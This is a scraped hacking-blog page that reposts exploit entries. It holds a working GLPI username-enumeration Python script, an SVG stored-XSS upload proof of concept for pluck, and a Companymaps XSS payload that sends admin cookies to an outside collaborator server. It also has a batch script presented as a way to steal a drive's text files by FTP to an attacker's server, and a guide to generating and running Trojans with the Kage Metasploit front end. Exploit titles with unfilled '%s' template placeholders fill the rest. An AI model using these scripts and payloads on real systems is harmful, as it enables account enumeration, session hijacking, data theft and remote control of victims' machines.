# Exploit Title: GLPI 9.5.7 - Username Enumeration
# Date: 04/29/2023
# Author: Rafael B.
# Vendor Homepage: https://glpi-project.org/pt-br/
# Affected Versions: GLPI version 9.1 <= 9.5.7
# Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz
import requests
from bs4 import BeautifulSoup
# Send a GET request to the page to receive the csrf token and the cookie session
response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')
# Parse the HTML using BeautifulSoup
soup = BeautifulSoup(response.content, 'html.parser')
# Find the input element with the CSRF token
csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})
# Extract the CSRF token if it exists
if csrf_input:
csrf_token = csrf_input['value']
# Extract the session cookie
session_cookie_value = None
if response.cookies:
session_cookie_value = next(iter(response.cookies.values()))
# Set the custom url where the GLPI recover password is located
url = "http://127.0.0.1:80/glpi/front/lostpassword.php"
headers = {"User-Agent": "Windows NT 10.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/glpi/front/lostpassword.php?lostpassword=1", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
# Open the email list file and read each line
with open('emails.txt', 'r') as f:
email_list = f.readlines()
# Loop through the email list and make a POST request for each email
for email in email_list:
email = email.strip()
data = {"email": email, "update": "Save", "_glpi_csrf_token": csrf_token}
cookies = {"glpi_f6478bf118ca2449e9e40b198bd46afe": session_cookie_value}
freq = requests.post(url, headers=headers, cookies=cookies, data=data)
# Do a new GET request to get the updated CSRF token and session cookie for the next iteration
response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')
soup = BeautifulSoup(response.content, 'html.parser')
csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})
if csrf_input:
csrf_token = csrf_input['value']
session_cookie_value = None
if response.cookies:
session_cookie_value = next(iter(response.cookies.values()))
# Parse the response and grep the match e-mails
soup = BeautifulSoup(freq.content, 'html.parser')
div_center = soup.find('div', {'class': 'center'})
Result = (f"Email: {email}, Result: {div_center.text.strip()}")
if "An email has been sent to your email address. The email contains information for reset your password." in Result:
print ("\033[1;32m Email Found! -> " + Result)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
-
Entries
16114 -
Comments
7952 -
Views
863115632
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
Application: pluck
Version: 4.7.18
Bugs: XSS
Technology: PHP
Vendor URL: https://github.com/pluck-cms/pluck
Software Link: https://github.com/pluck-cms/pluck
Date of found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. create .svg file.
2. svg file content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)
poc request
POST /pluck-4.7.18/admin.php?action=files HTTP/1.1
Host: localhost
Content-Length: 672
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/pluck-4.7.18/admin.php?action=files
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de
Connection: close
------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="submit"
Upload
------WebKitFormBoundaryJMTiFxESCx7aNqmI--
4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg
# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS)
# Date: 27.04.2023
# Exploit Author: Lucas Noki (0xPrototype)
# Vendor Homepage: https://github.com/vogtmh
# Software Link: https://github.com/vogtmh/cmaps
# Version: 8.0
# Tested on: Mac, Windows, Linux
# CVE : CVE-2023-29983
*Steps to reproduce:*
1. Clone the repository and install the application
2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>
4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.
5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog
6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameter
In a real world case you would need to wait for the admin to log into the application and open the auditlog tab.
Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.
Foreword
Not long ago, I had this idea, which is to automatically run a script and upload files in the PC to our customized server. For example, we can specify that all word documents on the USB flash drive are uploaded to our server, which has achieved the purpose of stealing. So let’s see how it is implemented!
Code
@Echo Off
Echo open server ip ftp.up
Echo username ftp.up
Echo password ftp.up
Echo binaryftp.up
Echo promptftp.up
Echo lcd 'E:\*.txt'ftp.up
Echo mput 'E:\*.txt'ftp.up
Echo byeftp.up
FTP -s:ftp.up
del ftp.up /q
Using
Save the file code as a .bat file. After double-clicking to run, all txt files in E disk will be uploaded to the server we specified.

Title: Kage——msf visual remote control platform
HACKER · %s · %s
Project address
https://github.com/WayzDev/Kage/
Download and Install
Click me to download~
After downloading, give run permissions.
Start the service
msfrpcd -U msf -P 123456 -a 0.0.0.0
Parameter description: -U: login kage account -P: login kage password -a: msf's IP address (it's very important. If kage and msf are on the same computer, use 0.0.0.0 that is 127.0.0.1)
Start the program and log in to ./Kage.0.1.1-beta_linux.AppImage
Enter your account number and password and corresponding port
After successful login, the following is shown
We can use commands to generate Trojans, or generate Trojans on the platform, according to our specific situation.
Configure listening
Click Create after the configuration is completed
On the target side, successfully run the generated Trojan and view the session.
All kinds of slutty operations
System Information
File Information
Route Information
Install B and pull it ~~~
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 2 views

Cmaps v8.0 - SQL injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

TinyWebGallery v2.5 - Remote Code Execution (RCE)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Optoma 1080PSTX Firmware C02 - Authentication Bypass
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

WBiz Desk 1.2 - SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 2 views

Trend Micro OfficeScan Client 10.0 - ACL Service LPE
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Screen SFT DAB 600/C - Authentication Bypass Account Creation
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Jedox 2022.4.2 - Code Execution via RPC Interfaces
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Jedox 2022.4.2 - Remote Code Execution via Directory Traversal
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module
HACKER · %s · %s
- Read more...
- 0 comments
- 2 views

Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

Apache Superset 2.0.0 - Authentication Bypass
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

e107 v2.3.2 - Reflected XSS
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

thrsrossi Millhouse-Project 1.414 - Remote Code Execution
HACKER · %s · %s
- Read more...
- 0 comments
- 2 views

PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view